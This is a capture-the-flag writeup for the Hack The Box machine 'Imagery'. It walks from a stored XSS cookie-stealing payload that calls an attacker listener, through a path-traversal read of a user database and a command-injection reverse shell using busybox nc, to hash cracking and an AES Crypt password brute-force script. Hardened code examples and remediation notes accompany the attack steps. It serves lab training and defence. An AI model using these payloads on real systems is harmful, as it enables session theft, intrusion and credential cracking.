
Imagery — HTB Writeup

Platform: Linux
IP: 10.129.165.87
Difficulty: Medium
Author: NoSec



Recon – Nmap

nmap -sVC 10.129.165.87
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.12.7)
|_http-title: Image Gallery
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
  • 22/tcp – SSH
  • 8000/tcp – HTTP (Werkzeug, Python 3.12.7)

Port 8000 serves an Image Gallery web application, a Python app running under the Werkzeug development server.


Stored XSS – admin cookie theft

The bug report page stores submitted text and shows it to the admin without escaping, so it is vulnerable to stored XSS. Start a simple HTTP server on your attacker host to catch the callback:

python3 -m http.server 4444

Submit this payload in a bug report:

<img src=x onerror=fetch('http://<YOUR-IP>:4444/?pwned='+document.cookie)>

When the admin opens the report, the admin session cookie is sent to your listener and shows up in its access log as the pwned= query parameter. This only works because the session cookie is readable from document.cookie, i.e. it was not set with the HttpOnly flag.
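To make the fix side concrete, here is an added Python example (not code from the box or from the writeup's author) of the vulnerable pattern behind a stored XSS next to its hardened form: a hypothetical report-rendering function that interpolates the stored body unescaped, the same function with HTML escaping on output, and the cookie flags and CSP that would have blocked the cookie theft. The function names, the attacker host in the payload and the header values are assumptions.

```python
import html
import http.cookies

# Constructed payload, same shape as the one submitted through the bug-report form.
XSS_PAYLOAD = "<img src=x onerror=fetch('http://ATTACKER:4444/?pwned='+document.cookie)>"


def render_report_vulnerable(description: str) -> str:
    """Hypothetical vulnerable handler: the stored report body is interpolated into the
    admin's page unchanged, so the <img> tag is parsed as markup and onerror fires."""
    return f'<div class="report"><p>{description}</p></div>'


def render_report_escaped(description: str) -> str:
    """Hardened form: HTML-encode on output. The browser renders the payload as literal
    text and no script runs, whatever the report contains."""
    return f'<div class="report"><p>{html.escape(description, quote=True)}</p></div>'


def session_cookie_header(value: str) -> str:
    """Set-Cookie value for the admin session with the flags that would have blunted the
    theft: HttpOnly hides it from document.cookie, Secure keeps it off plaintext HTTP,
    SameSite=Lax stops most cross-site requests from carrying it."""
    jar = http.cookies.SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    return jar["session"].OutputString()


def security_headers() -> dict:
    """Response headers for the admin pages (assumed policy). The CSP forbids inline event
    handlers and fetch() to foreign origins, so even an unescaped payload cannot call home."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; connect-src 'self'; img-src 'self'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print(render_report_vulnerable(XSS_PAYLOAD))
    print(render_report_escaped(XSS_PAYLOAD))
    print("Set-Cookie:", session_cookie_header("ADMIN_COOKIE"))
```

Escaping on output is the primary fix; the cookie flags and CSP are defence in depth that keep a missed escape from turning into a session theft.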


LFI on the admin endpoint

With the stolen admin cookie you can call the admin log endpoint, /admin/get_system_log, which opens a file named by the log_identifier parameter. The value is neither canonicalized nor restricted to the log directory, so ../ sequences reach any file the web user can read:

COOKIE="session=ADMIN_COOKIE"

Example:

curl -s -H "Cookie: $COOKIE" \
 "http://10.129.165.87:8000/admin/get_system_log?log_identifier=../../../../home/web/web/db.json" | jq .

This returns the application's user store, db.json, with usernames and password hashes.
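As an added Python example (not the application's own code), here is a hypothetical implementation of the two ways the admin log endpoint could resolve log_identifier: the naive join that lets the traversal above reach db.json, and a hardened resolver that whitelists the identifier's syntax, canonicalizes the path and confirms it still sits under the log directory. The log directory path and the function names are assumptions.

```python
import posixpath
import re
from pathlib import Path

# Assumed log directory for the illustration; the page does not say where the real app keeps logs.
LOG_ROOT = Path("/var/log/imagery")

# One path component of safe characters. ".." still matches on purpose, so the
# second check below has to do its job too.
IDENTIFIER_RE = re.compile(r"[A-Za-z0-9_.-]+")


def resolve_log_vulnerable(log_identifier: str) -> str:
    """Hypothetical vulnerable version: joins the parameter onto the log directory and
    opens whatever that names. Returns the normalized path the kernel would open."""
    return posixpath.normpath(posixpath.join(str(LOG_ROOT), log_identifier))


def resolve_log_safe(log_identifier: str, root: Path = LOG_ROOT) -> Path:
    """Hardened version: whitelist the syntax, then canonicalize (resolve() follows
    symlinks and collapses '..') and require the result to be strictly inside root."""
    if not IDENTIFIER_RE.fullmatch(log_identifier):
        raise ValueError(f"rejected log_identifier: {log_identifier!r}")
    base = root.resolve()
    candidate = (base / log_identifier).resolve()
    if base not in candidate.parents:
        raise ValueError(f"path escapes log directory: {candidate}")
    return candidate


def is_allowed(log_identifier: str, root: Path = LOG_ROOT) -> bool:
    """True if the hardened resolver would serve this identifier."""
    try:
        resolve_log_safe(log_identifier, root)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    traversal = "../../../../home/web/web/db.json"  # the identifier used in the writeup
    print("vulnerable opens:", resolve_log_vulnerable(traversal))
    for ident in ("app.log", traversal, "..", "."):
        print("safe:", ident, "->", is_allowed(ident))
```

Mapping log_identifier to a fixed dictionary of allowed names is simpler still and removes the file-system check entirely; the resolver above is for the case where the set of log files is not known in advance.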


Hash cracking

Save the hash locally:

echo '2c65c8d7bf<HASH>' >> hashes.txt

Crack with John:

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

The 32-hex-character hashes are unsalted MD5, hence raw-md5. After cracking, log in to the webapp with the recovered credentials; the testuser account is the one used in the next step.


Webshell – Command Injection in image transform

As a normal user (testuser), upload an image, intercept the transform/crop request in Burp and modify the height field in the JSON body. The value ends up in a shell command, so a ; terminates the intended command and the rest runs as a separate command:

"height":"100; busybox nc YOUR-IP 4444 -e /bin/sh; echo"

Start a listener:

nc -lvnp 4444

Trigger the transform and catch a reverse shell as the web user.
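The pattern that makes this work, as an added Python example rather than the box's actual code: a hypothetical transform builder that pastes the request's width and height into a shell command string, next to a hardened builder that validates the dimensions as bounded integers and hands an argv list to subprocess without a shell. The injected height is the writeup's payload with the attacker address left as a placeholder; the convert command line and the limits are assumptions.

```python
import re
import subprocess
from typing import List

# Constructed request values. INJECTED_HEIGHT is the writeup's payload with a placeholder address.
BENIGN_HEIGHT = "100"
INJECTED_HEIGHT = "100; busybox nc ATTACKER-IP 4444 -e /bin/sh; echo"

MAX_DIMENSION = 8192  # assumed upper bound for a gallery thumbnail/crop


def build_transform_vulnerable(src: str, dst: str, width, height) -> str:
    """Hypothetical vulnerable builder: request fields are pasted into one string that is
    handed to a shell (subprocess with shell=True). The ';' in height ends the convert
    command and the shell runs busybox nc as the web user."""
    return f"convert {src} -resize {width}x{height} {dst}"


def parse_dimension(value) -> int:
    """Accept only an ASCII integer within bounds; JSON may deliver it as int or str."""
    if isinstance(value, bool):
        raise ValueError("dimension must be a number")
    if isinstance(value, str):
        if not re.fullmatch(r"[0-9]{1,5}", value):
            raise ValueError(f"rejected dimension {value!r}")
        value = int(value)
    if not isinstance(value, int) or not 1 <= value <= MAX_DIMENSION:
        raise ValueError(f"dimension out of range: {value!r}")
    return value


def build_transform_safe(src: str, dst: str, width, height) -> List[str]:
    """Hardened builder: validated integers and an argv list that never touches a shell.
    src/dst must be server-generated paths; a user-chosen name starting with '-' would be
    read by convert as an option, which is a separate injection the shell fix does not cover."""
    w, h = parse_dimension(width), parse_dimension(height)
    for path in (src, dst):
        if path.startswith("-"):
            raise ValueError(f"bad file name: {path!r}")
    return ["convert", src, "-resize", f"{w}x{h}", dst]


def run_transform(argv: List[str]) -> None:
    """Execute without a shell: metacharacters inside argv elements are passed literally."""
    subprocess.run(argv, shell=False, check=True, timeout=30)


def is_height_accepted(height) -> bool:
    """True if the hardened path would accept this height value."""
    try:
        parse_dimension(height)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("vulnerable:", build_transform_vulnerable("in.png", "out.png", 100, INJECTED_HEIGHT))
    print("safe:", build_transform_safe("in.png", "out.png", 100, BENIGN_HEIGHT))
    print("injected height accepted by safe path:", is_height_accepted(INJECTED_HEIGHT))
```

Using the image library's own API (for example Pillow's resize/crop in-process) removes the external command entirely, which is the cleanest fix; where an external tool is unavoidable, the argv-list form above is the minimum.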


Pivot to mark – backup bruteforce

From the web shell enumerate backups:

ls -la /var/backup

Find:

web_20250806_120723.zip.aes

Download the archive to your attacker host. The .aes extension is the AES Crypt format, which is protected by a password rather than a key, so it can be brute-forced offline with a wordlist (custom script or a pyAesCrypt loop). Once decrypted, unzip it and extract the older db.json, which contains historical user hashes, including mark's.

Crack the mark hash offline:

echo '<mark_hash>' >> hashes.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
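The brute-force loop the writeup refers to, as an added Python example (not the author's script). It uses only the standard library: AES Crypt version 2 derives the key with 8192 rounds of SHA-256 over IV1 and the UTF-16LE password, then stores an HMAC-SHA256 over the 48 encrypted session-key bytes, so a candidate password can be verified from the header alone without any AES. The sample header built by make_sample_file and the short wordlist are constructed here for a self-contained run; point the script at the real .aes archive and rockyou.txt instead.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

KDF_ROUNDS = 8192  # fixed by the AES Crypt v2 format


def stretch_key(password: str, iv1: bytes) -> bytes:
    """AES Crypt v2 key derivation: start from IV1 padded to 32 bytes, then 8192 rounds of
    SHA-256 over (digest || password as UTF-16LE). Same construction pyAesCrypt uses."""
    digest = iv1 + b"\x00" * 16
    pw = password.encode("utf_16_le")
    for _ in range(KDF_ROUNDS):
        digest = hashlib.sha256(digest + pw).digest()
    return digest


def parse_header(data: bytes):
    """Pull IV1, the 48 encrypted session-key bytes and their HMAC from a v2 file header."""
    if data[:3] != b"AES" or data[3] != 2:
        raise ValueError("not an AES Crypt version 2 file")
    pos = 5  # 'AES', version byte, reserved byte
    while True:  # extension records: 2-byte big-endian length then data; a zero length ends the list
        ext_len = int.from_bytes(data[pos:pos + 2], "big")
        pos += 2
        if ext_len == 0:
            break
        pos += ext_len
    iv1 = data[pos:pos + 16]
    enc_iv_key = data[pos + 16:pos + 64]
    hmac1 = data[pos + 64:pos + 96]
    if len(hmac1) != 32:
        raise ValueError("truncated header")
    return iv1, enc_iv_key, hmac1


def check_password(header, password: str) -> bool:
    """A candidate is right iff HMAC-SHA256(stretched key, encrypted IV2||key) matches the
    stored tag. No decryption is needed, so the loop is pure hashing."""
    iv1, enc_iv_key, hmac1 = header
    tag = hmac.new(stretch_key(password, iv1), enc_iv_key, hashlib.sha256).digest()
    return hmac.compare_digest(tag, hmac1)


def brute_force(data: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry that authenticates the header, else None."""
    header = parse_header(data)
    for word in wordlist:
        word = word.rstrip("\r\n")
        if word and check_password(header, word):
            return word
    return None


def make_sample_file(password: str) -> bytes:
    """Constructed fixture for a self-contained run: a v2 header whose tag was computed with
    `password`. The 48 'encrypted' bytes are random because the check never decrypts them;
    a real archive carries the encrypted IV2 and data key there, followed by the ciphertext."""
    iv1 = os.urandom(16)
    enc_iv_key = os.urandom(48)
    tag = hmac.new(stretch_key(password, iv1), enc_iv_key, hashlib.sha256).digest()
    return b"AES\x02\x00" + b"\x00\x00" + iv1 + enc_iv_key + tag + b"\x00" * 16


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # python3 aescrypt_brute.py web_20250806_120723.zip.aes rockyou.txt
        with open(sys.argv[1], "rb") as f:
            data = f.read(65536)  # the header is small; this is plenty even with extensions
        with open(sys.argv[2], encoding="latin-1") as wl:
            print(brute_force(data, wl))
    else:
        print(brute_force(make_sample_file("hunter2"), ["123456", "password", "hunter2"]))
```

The 8192-round stretch is the only real cost, about ten milliseconds per candidate in pure Python, which is fine for a weak password high up in rockyou but slow for a deep run; the check itself is the same whichever tool you use. When a password is returned, decrypt with pyAesCrypt's decryptFile (or the aescrypt command-line tool) and unzip the result to get the older db.json.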

User access – su mark

From the web shell, switch to mark with the cracked password. su needs a controlling terminal, so upgrade the reverse shell to a PTY first if it is not interactive (python3 is available on the box):

su mark

User flag obtained.


Summary

  • Stored XSS → admin cookie theft
  • LFI via admin log endpoint → db.json dump
  • Hash cracking → testuser access
  • Command injection in image transform → webshell
  • Backup bruteforce → historical db.json with mark hash
  • Hash cracking → mark credentials → su mark → user flag

Notes & remediation

  • Escape user-supplied text on output (HTML-encode bug report bodies), deploy a CSP that blocks inline handlers and foreign connect-src, and set HttpOnly, Secure and SameSite on the session cookie.
  • Canonicalize the requested log path and verify it stays inside the log directory, or better, map log_identifier to a fixed allow-list of file names; reject anything containing path separators or .. components.
  • Never build shell commands from untrusted input; validate dimensions as bounded integers and call the image library directly or pass an argument list to subprocess without a shell.
  • Isolate image processing and drop privileges for processors.
  • Encrypt backups with a strong, randomly generated passphrase under proper key management, and keep them unreadable to the web application's user; a password-protected format such as AES Crypt is only as strong as the password.

🔐 Root part is only available in the private Telegram group while the box is active in Season 8. 👉 Join for the full writeup, extra tips and exclusive content: 📡 https://t.me/nosecpwn

